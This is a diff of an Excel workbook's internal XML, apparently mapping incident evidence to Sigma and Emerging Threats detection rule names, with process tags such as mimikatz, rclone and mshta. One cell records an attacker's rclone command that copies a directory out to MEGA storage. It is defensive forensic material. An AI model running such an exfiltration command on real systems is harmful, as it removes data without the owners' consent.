-    <t>{"sigma_uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "sigma_rule_name": "Whoami.EXE Execution Anomaly"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", "sigma_rule_name": "Whoami.EXE Execution From Privileged Process"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", "sigma_rule_name": "WMI Module Loaded By Uncommon Process"}</t>
-  </si>
-  <si>
     <t>dfir20240224-eid0002</t>
   </si>
   <si>
@@ -608,10 +488,334 @@
     <t>evidence</t>
   </si>
   <si>
-    <t>sigma_object</t>
-  </si>
-  <si>
     <t>ns_meta</t>
+  </si>
+  <si>
+    <t>["netclt-pid0021"]</t>
+  </si>
+  <si>
+    <t>["whoami-pid0001"]</t>
+  </si>
+  <si>
+    <t>["qusr-pid0001"]</t>
+  </si>
+  <si>
+    <t>["anydesk-pid0001", "curl-pid0003" ]</t>
+  </si>
+  <si>
+    <t>["mimikatz-pid0018"]</t>
+  </si>
+  <si>
+    <t>["mimikatz-pid0018",]</t>
+  </si>
+  <si>
+    <t>["netclt-pid0012"]</t>
+  </si>
+  <si>
+    <t>["netclt-pid0022"]</t>
+  </si>
+  <si>
+    <t>["rclone-pid0001"]</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "rclone --config=rclone.conf copy c:\&lt;directory&gt; mega:FTP"}</t>
+  </si>
+  <si>
+    <t>["rclone-pid0004"]</t>
+  </si>
+  <si>
+    <t>["mshta-pid0001"]</t>
+  </si>
+  <si>
+    <t>["mshta-pid0005"]</t>
+  </si>
+  <si>
+    <t>["pdq-pid0001"]</t>
+  </si>
+  <si>
+    <t>["netscan-pid0001"]</t>
+  </si>
+  <si>
+    <t>["netclt-pid0001"]</t>
+  </si>
+  <si>
+    <t>ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1</t>
+  </si>
+  <si>
+    <t>ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers</t>
+  </si>
+  <si>
+    <t>ET EXPLOIT Atlassian Confluence RCE Attempt Observed (CVE-2023-22527) M1</t>
+  </si>
+  <si>
+    <t>ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)</t>
+  </si>
+  <si>
+    <t>ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl</t>
+  </si>
+  <si>
+    <t>ET HUNTING PE EXE Download over raw TCP</t>
+  </si>
+  <si>
+    <t>ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1</t>
+  </si>
+  <si>
+    <t>ET INFO Dotted Quad Host HTA Request</t>
+  </si>
+  <si>
+    <t>ET INFO User-Agent (python-requests) Inbound to Webserver</t>
+  </si>
+  <si>
+    <t>ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)</t>
+  </si>
+  <si>
+    <t>ET POLICY Possible HTA Application Download</t>
+  </si>
+  <si>
+    <t>ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199</t>
+  </si>
+  <si>
+    <t>ET WEB_CLIENT PowerShell call in script 1</t>
+  </si>
+  <si>
+    <t>ET WEB_CLIENT PowerShell call in script 2</t>
+  </si>
+  <si>
+    <t>ET WEB_SERVER Possible SQL Injection (exec) in HTTP Request Body</t>
+  </si>
+  <si>
+    <t>ET WEB_SERVER WebShell Generic - net user</t>
+  </si>
+  <si>
+    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M1</t>
+  </si>
+  <si>
+    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22515 Vulnerable Server Detected M2</t>
+  </si>
+  <si>
+    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M1</t>
+  </si>
+  <si>
+    <t>ET WEB_SPECIFIC_APPS Atlassian Confluence CVE-2023-22518 Vulnerable Server Detected Version 8.x M2</t>
+  </si>
+  <si>
+    <t>ETPRO ATTACK_RESPONSE Possibly Malicious VBScript Executing WScript.Shell Run M1</t>
+  </si>
+  <si>
+    <t>ETPRO HUNTING Observed Suspicious Base64 Encoded Wide String Inbound (zip)</t>
+  </si>
+  <si>
+    <t>ETPRO HUNTING Suspicious Offset PE EXE or DLL Download on Non-Standard Ports</t>
+  </si>
+  <si>
+    <t>ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP</t>
+  </si>
+  <si>
+    <t>ETPRO MALWARE Possible Malicious VBScript calling PowerShell over HTTP 1 M2</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0090</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0091</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0092</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0093</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0094</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0095</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0096</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0097</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0098</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0099</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0100</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0101</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0102</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0103</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0104</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0105</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0106</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0107</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0108</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0109</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0110</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0111</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0112</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0113</t>
+  </si>
+  <si>
+    <t>dfir20240224-eid0114</t>
+  </si>
+  <si>
+    <t>etpro</t>
+  </si>
+  <si>
+    <t>cd951fdc-4b2f-47f5-ba99-a33bf61e3770    :       Always Install Elevated Windows Installer</t>
+  </si>
+  <si>
+    <t>e32d4572-9826-4738-b651-95fa63747e8a    :       Base64 Encoded PowerShell Command Detected</t>
+  </si>
+  <si>
+    <t>7d9263bd-dc47-4a58-bc92-5474abab390c    :       Change Winevt Channel Access Permission Via Registry</t>
+  </si>
+  <si>
+    <t>2f78da12-f7c7-430b-8b19-a28f269b77a3    :       Disable Windows Event Logging Via Registry</t>
+  </si>
+  <si>
+    <t>fcddca7c-b9c0-4ddf-98da-e1e2d18b0157    :       Disabled Windows Defender Eventlog</t>
+  </si>
+  <si>
+    <t>61065c72-5d7d-44ef-bf41-6a36684b545f    :       Elevated System Shell Spawned</t>
+  </si>
+  <si>
+    <t>98767d61-b2e8-4d71-b661-e36783ee24c1    :       Gzip Archive Decode Via PowerShell</t>
+  </si>
+  <si>
+    <t>a642964e-bead-4bed-8910-1bb4d63e3b4d    :       HackTool - Mimikatz Execution</t>
+  </si>
+  <si>
+    <t>502b42de-4306-40b4-9596-6f590c81f073    :       Local Accounts Discovery</t>
+  </si>
+  <si>
+    <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0    :       Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
+  </si>
+  <si>
+    <t>183e7ea8-ac4b-4c23-9aec-b3dac4e401ac    :       Net.EXE Execution</t>
+  </si>
+  <si>
+    <t>cd219ff3-fa99-45d4-8380-a7d15116c6dc    :       New User Created Via Net.EXE</t>
+  </si>
+  <si>
+    <t>f4bbd493-b796-416e-bbf2-121235348529    :       Non Interactive PowerShell Process Spawned</t>
+  </si>
+  <si>
+    <t>d679950c-abb7-43a6-80fb-2a480c4fc450    :       PDQ Deploy Remote Adminstartion Tool Execution</t>
+  </si>
+  <si>
+    <t>d7bcd677-645d-4691-a8d4-7a5602b780d1    :       Potential PowerShell Command Line Obfuscation</t>
+  </si>
+  <si>
+    <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892    :       Potentially Suspicious CMD Shell Output Redirect</t>
+  </si>
+  <si>
+    <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c    :       PowerShell Base64 Encoded FromBase64String Cmdlet</t>
+  </si>
+  <si>
+    <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7    :       PowerShell Download Pattern</t>
+  </si>
+  <si>
+    <t>6e897651-f157-4d8f-aaeb-df8151488385    :       PowerShell Web Download</t>
+  </si>
+  <si>
+    <t>86085955-ea48-42a2-9dd3-85d4c36b167d    :       Process Terminated Via Taskkill</t>
+  </si>
+  <si>
+    <t>b52e84a3-029e-4529-b09b-71d19dd27e94    :       Remote Access Tool - AnyDesk Execution</t>
+  </si>
+  <si>
+    <t>b98d0db6-511d-45de-ad02-e82a98729620    :       Remotely Hosted HTA File Executed Via Mshta.EXE</t>
+  </si>
+  <si>
+    <t>2aa0a6b4-a865-495b-ab51-c28249537b75    :       Startup Folder File Write</t>
+  </si>
+  <si>
+    <t>88872991-7445-4a22-90b2-a3adadb0e827    :       Stop Windows Service Via Net.EXE</t>
+  </si>
+  <si>
+    <t>590a5f4c-6c8c-4f10-8307-89afe9453a9d    :       Suspicious Child Process Created as System</t>
+  </si>
+  <si>
+    <t>7be5fb68-f9ef-476d-8b51-0256ebece19e    :       Suspicious Execution of Hostname</t>
+  </si>
+  <si>
+    <t>fb843269-508c-4b76-8b8d-88679db22ce7    :       Suspicious Execution of Powershell with Base64</t>
+  </si>
+  <si>
+    <t>5cb299fc-5fb1-4d07-b989-0644c68b6043    :       Suspicious File Download From IP Via Curl.EXE</t>
+  </si>
+  <si>
+    <t>d75d6b6b-adb9-48f7-824b-ac2e786efe1f    :       Suspicious FromBase64String Usage On Gzip Archive - Process Creation</t>
+  </si>
+  <si>
+    <t>03cc0c25-389f-4bf8-b48d-11878079f1ca    :       Suspicious MSHTA Child Process</t>
+  </si>
+  <si>
+    <t>754ed792-634f-40ae-b3bc-e0448d33f695    :       Suspicious PowerShell Parent Process</t>
+  </si>
+  <si>
+    <t>2617e7ed-adb7-40ba-b0f3-8f9945fe6c09    :       Suspicious SYSTEM User Process Creation</t>
+  </si>
+  <si>
+    <t>63332011-f057-496c-ad8d-d2b6afb27f96    :       Suspicious Tasklist Discovery Command</t>
+  </si>
+  <si>
+    <t>ce72ef99-22f1-43d4-8695-419dcb5d9330    :       Suspicious Windows Service Tampering</t>
+  </si>
+  <si>
+    <t>d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6    :       Unusually Long PowerShell CommandLine</t>
+  </si>
+  <si>
+    <t>e28a5a99-da44-436d-b7a0-2afc20a5f413    :       Whoami Utility Execution</t>
+  </si>
+  <si>
+    <t>8de1cbe8-d6f5-496d-8237-5f44a721c7a0    :       Whoami.EXE Execution Anomaly</t>
+  </si>
+  <si>
+    <t>79ce34ca-af29-4d0e-b832-fc1b377020db    :       Whoami.EXE Execution From Privileged Process</t>
+  </si>
+  <si>
+    <t>671bb7e3-a020-4824-a00e-2ee5b55f385e    :       WMI Module Loaded By Uncommon Process</t>
+  </si>
+  <si>
+    <t>sigma</t>
+  </si>
+  <si>
+    <t>["anydesk-pid0001", "pshell-pid0003" ]</t>
+  </si>
+  <si>
+    <t>["cmd-pid0002"]</t>
   </si>
 </sst>
 </file>
@@ -653,9 +857,12 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="2">
+  <cellXfs count="3">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
+      <alignment wrapText="1"/>
+    </xf>
+    <xf numFmtId="11" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
   </cellXfs>
@@ -701,8 +908,8 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G90" totalsRowShown="0" dataDxfId="7">
-  <autoFilter ref="A1:G90" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G115" totalsRowShown="0" dataDxfId="7">
+  <autoFilter ref="A1:G115" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
   <tableColumns count="7">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
     <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
@@ -1033,10 +1240,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:G90"/>
+  <dimension ref="A1:G115"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="E8" sqref="E8"/>
+    <sheetView tabSelected="1" topLeftCell="A28" workbookViewId="0">
+      <selection activeCell="E51" sqref="E51"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -1059,19 +1266,19 @@
         <v>1</v>
       </c>
       <c r="C1" t="s">
-        <v>185</v>
+        <v>145</v>
       </c>
       <c r="D1" t="s">
-        <v>188</v>
+        <v>148</v>
       </c>
       <c r="E1" t="s">
-        <v>189</v>
+        <v>149</v>
       </c>
       <c r="F1" t="s">
         <v>23</v>
       </c>
       <c r="G1" t="s">
-        <v>191</v>
+        <v>150</v>
       </c>
     </row>
     <row r="2" spans="1:7" ht="34" x14ac:dyDescent="0.2">
@@ -1079,13 +1286,13 @@
         <v>3</v>
       </c>
       <c r="B2" s="1" t="s">
-        <v>184</v>
+        <v>144</v>
       </c>
       <c r="C2" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D2" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E2" s="1" t="s">
         <v>7</v>
@@ -1097,16 +1304,16 @@
     </row>
     <row r="3" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A3" s="1" t="s">
-        <v>96</v>
+        <v>56</v>
       </c>
       <c r="B3" s="1" t="s">
-        <v>184</v>
+        <v>144</v>
       </c>
       <c r="C3" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D3" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E3" s="1" t="s">
         <v>4</v>
@@ -1118,14 +1325,16 @@
     </row>
     <row r="4" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A4" s="1" t="s">
-        <v>97</v>
-      </c>
-      <c r="B4" s="1"/>
+        <v>57</v>
+      </c>
+      <c r="B4" s="1" t="s">
+        <v>151</v>
+      </c>
       <c r="C4" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D4" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E4" s="1" t="s">
         <v>17</v>
@@ -1137,14 +1346,16 @@
     </row>
     <row r="5" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A5" s="1" t="s">
-        <v>98</v>
-      </c>
-      <c r="B5" s="1"/>
+        <v>58</v>
+      </c>
+      <c r="B5" s="1" t="s">
+        <v>152</v>
+      </c>
       <c r="C5" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D5" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E5" s="1" t="s">
         <v>18</v>
@@ -1156,14 +1367,16 @@
     </row>
     <row r="6" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A6" s="1" t="s">
-        <v>99</v>
-      </c>
-      <c r="B6" s="1"/>
+        <v>59</v>
+      </c>
+      <c r="B6" s="1" t="s">
+        <v>153</v>
+      </c>
       <c r="C6" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D6" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E6" s="1" t="s">
         <v>19</v>
@@ -1175,14 +1388,16 @@
     </row>
     <row r="7" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A7" s="1" t="s">
-        <v>100</v>
-      </c>
-      <c r="B7" s="1"/>
+        <v>60</v>
+      </c>
+      <c r="B7" s="1" t="s">
+        <v>154</v>
+      </c>
       <c r="C7" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D7" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E7" s="1" t="s">
         <v>5</v>
@@ -1194,12 +1409,12 @@
     </row>
     <row r="8" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A8" s="1" t="s">
-        <v>101</v>
+        <v>61</v>
       </c>
       <c r="B8" s="1"/>
       <c r="C8" s="1"/>
       <c r="D8" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E8" s="1" t="s">
         <v>6</v>
@@ -1211,15 +1426,15 @@
     </row>
     <row r="9" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A9" s="1" t="s">
-        <v>102</v>
+        <v>62</v>
       </c>
       <c r="B9" s="1"/>
       <c r="C9" s="1"/>
       <c r="D9" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E9" s="1" t="s">
-        <v>49</v>
+        <v>48</v>
       </c>
       <c r="F9" s="1"/>
       <c r="G9" s="1" t="s">
@@ -1228,15 +1443,15 @@
     </row>
     <row r="10" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A10" s="1" t="s">
-        <v>103</v>
+        <v>63</v>
       </c>
       <c r="B10" s="1"/>
       <c r="C10" s="1"/>
       <c r="D10" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E10" s="1" t="s">
-        <v>50</v>
+        <v>49</v>
       </c>
       <c r="F10" s="1"/>
       <c r="G10" s="1" t="s">
@@ -1245,15 +1460,15 @@
     </row>
     <row r="11" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A11" s="1" t="s">
-        <v>104</v>
+        <v>64</v>
       </c>
       <c r="B11" s="1"/>
       <c r="C11" s="1"/>
       <c r="D11" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E11" s="1" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="F11" s="1"/>
       <c r="G11" s="1" t="s">
@@ -1262,14 +1477,16 @@
     </row>
     <row r="12" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A12" s="1" t="s">
-        <v>105</v>
-      </c>
-      <c r="B12" s="1"/>
+        <v>65</v>
+      </c>
+      <c r="B12" s="1" t="s">
+        <v>163</v>
+      </c>
       <c r="C12" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D12" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E12" s="1" t="s">
         <v>8</v>
@@ -1281,12 +1498,14 @@
     </row>
     <row r="13" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A13" s="1" t="s">
-        <v>106</v>
-      </c>
-      <c r="B13" s="1"/>
+        <v>66</v>
+      </c>
+      <c r="B13" s="1" t="s">
+        <v>162</v>
+      </c>
       <c r="C13" s="1"/>
       <c r="D13" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E13" s="1" t="s">
         <v>10</v>
@@ -1298,14 +1517,16 @@
     </row>
     <row r="14" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A14" s="1" t="s">
-        <v>107</v>
-      </c>
-      <c r="B14" s="1"/>
+        <v>67</v>
+      </c>
+      <c r="B14" s="1" t="s">
+        <v>258</v>
+      </c>
       <c r="C14" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D14" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E14" s="1" t="s">
         <v>9</v>
@@ -1317,14 +1538,16 @@
     </row>
     <row r="15" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A15" s="1" t="s">
-        <v>108</v>
-      </c>
-      <c r="B15" s="1"/>
+        <v>68</v>
+      </c>
+      <c r="B15" s="1" t="s">
+        <v>158</v>
+      </c>
       <c r="C15" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D15" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E15" s="1" t="s">
         <v>11</v>
@@ -1336,14 +1559,16 @@
     </row>
     <row r="16" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A16" s="1" t="s">
-        <v>109</v>
-      </c>
-      <c r="B16" s="1"/>
+        <v>69</v>
+      </c>
+      <c r="B16" s="1" t="s">
+        <v>157</v>
+      </c>
       <c r="C16" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D16" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E16" s="1" t="s">
         <v>12</v>
@@ -1355,12 +1580,14 @@
     </row>
     <row r="17" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A17" s="1" t="s">
-        <v>110</v>
-      </c>
-      <c r="B17" s="1"/>
+        <v>70</v>
+      </c>
+      <c r="B17" s="1" t="s">
+        <v>156</v>
+      </c>
       <c r="C17" s="1"/>
       <c r="D17" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E17" s="1" t="s">
         <v>33</v>
@@ -1372,12 +1599,14 @@
     </row>
     <row r="18" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A18" s="1" t="s">
-        <v>111</v>
-      </c>
-      <c r="B18" s="1"/>
+        <v>71</v>
+      </c>
+      <c r="B18" s="1" t="s">
+        <v>155</v>
+      </c>
       <c r="C18" s="1"/>
       <c r="D18" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E18" s="1" t="s">
         <v>32</v>
@@ -1389,12 +1618,14 @@
     </row>
     <row r="19" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A19" s="1" t="s">
-        <v>112</v>
-      </c>
-      <c r="B19" s="1"/>
+        <v>72</v>
+      </c>
+      <c r="B19" s="1" t="s">
+        <v>155</v>
+      </c>
       <c r="C19" s="1"/>
       <c r="D19" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E19" s="1" t="s">
         <v>31</v>
@@ -1406,12 +1637,14 @@
     </row>
     <row r="20" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A20" s="1" t="s">
-        <v>113</v>
-      </c>
-      <c r="B20" s="1"/>
+        <v>73</v>
+      </c>
+      <c r="B20" s="1" t="s">
+        <v>155</v>
+      </c>
       <c r="C20" s="1"/>
       <c r="D20" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E20" s="1" t="s">
         <v>30</v>
@@ -1423,12 +1656,14 @@
     </row>
     <row r="21" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A21" s="1" t="s">
-        <v>114</v>
-      </c>
-      <c r="B21" s="1"/>
+        <v>74</v>
+      </c>
+      <c r="B21" s="1" t="s">
+        <v>155</v>
+      </c>
       <c r="C21" s="1"/>
       <c r="D21" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E21" s="1" t="s">
         <v>29</v>
@@ -1440,12 +1675,14 @@
     </row>
     <row r="22" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A22" s="1" t="s">
-        <v>115</v>
-      </c>
-      <c r="B22" s="1"/>
+        <v>75</v>
+      </c>
+      <c r="B22" s="1" t="s">
+        <v>159</v>
+      </c>
       <c r="C22" s="1"/>
       <c r="D22" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E22" s="1" t="s">
         <v>26</v>
@@ -1457,12 +1694,14 @@
     </row>
     <row r="23" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A23" s="1" t="s">
-        <v>116</v>
-      </c>
-      <c r="B23" s="1"/>
+        <v>76</v>
+      </c>
+      <c r="B23" s="1" t="s">
+        <v>164</v>
+      </c>
       <c r="C23" s="1"/>
       <c r="D23" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E23" s="1" t="s">
         <v>27</v>
@@ -1474,12 +1713,14 @@
     </row>
     <row r="24" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A24" s="1" t="s">
-        <v>117</v>
-      </c>
-      <c r="B24" s="1"/>
+        <v>77</v>
+      </c>
+      <c r="B24" s="1" t="s">
+        <v>165</v>
+      </c>
       <c r="C24" s="1"/>
       <c r="D24" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E24" s="1" t="s">
         <v>28</v>
@@ -1491,14 +1732,14 @@
     </row>
     <row r="25" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A25" s="1" t="s">
-        <v>118</v>
+        <v>78</v>
       </c>
       <c r="B25" s="1"/>
       <c r="C25" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D25" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E25" s="1" t="s">
         <v>13</v>
@@ -1510,14 +1751,14 @@
     </row>
     <row r="26" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A26" s="1" t="s">
-        <v>119</v>
+        <v>79</v>
       </c>
       <c r="B26" s="1"/>
       <c r="C26" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D26" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E26" s="1" t="s">
         <v>14</v>
@@ -1529,12 +1770,12 @@
     </row>
     <row r="27" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A27" s="1" t="s">
-        <v>120</v>
+        <v>80</v>
       </c>
       <c r="B27" s="1"/>
       <c r="C27" s="1"/>
       <c r="D27" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E27" s="1" t="s">
         <v>15</v>
@@ -1546,14 +1787,14 @@
     </row>
     <row r="28" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A28" s="1" t="s">
-        <v>121</v>
+        <v>81</v>
       </c>
       <c r="B28" s="1"/>
       <c r="C28" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D28" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E28" s="1" t="s">
         <v>16</v>
@@ -1565,15 +1806,15 @@
     </row>
     <row r="29" spans="1:7" ht="35" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A29" s="1" t="s">
-        <v>122</v>
+        <v>82</v>
       </c>
       <c r="B29" s="1"/>
       <c r="C29" s="1"/>
       <c r="D29" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E29" s="1" t="s">
-        <v>53</v>
+        <v>52</v>
       </c>
       <c r="F29" s="1"/>
       <c r="G29" s="1" t="s">
@@ -1582,14 +1823,14 @@
     </row>
     <row r="30" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A30" s="1" t="s">
-        <v>123</v>
+        <v>83</v>
       </c>
       <c r="B30" s="1"/>
       <c r="C30" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
       <c r="D30" s="1" t="s">
-        <v>187</v>
+        <v>147</v>
       </c>
       <c r="E30" s="1" t="s">
         <v>20</v>
@@ -1601,14 +1842,14 @@
     </row>
     <row r="31" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A31" s="1" t="s">
-        <v>124</v>
+        <v>84</v>
       </c>
       <c r="B31" s="1"/>
       <c r="C31" s="1" t="s">
-        <v>186</v>
+        <v>146</v>
       </c>
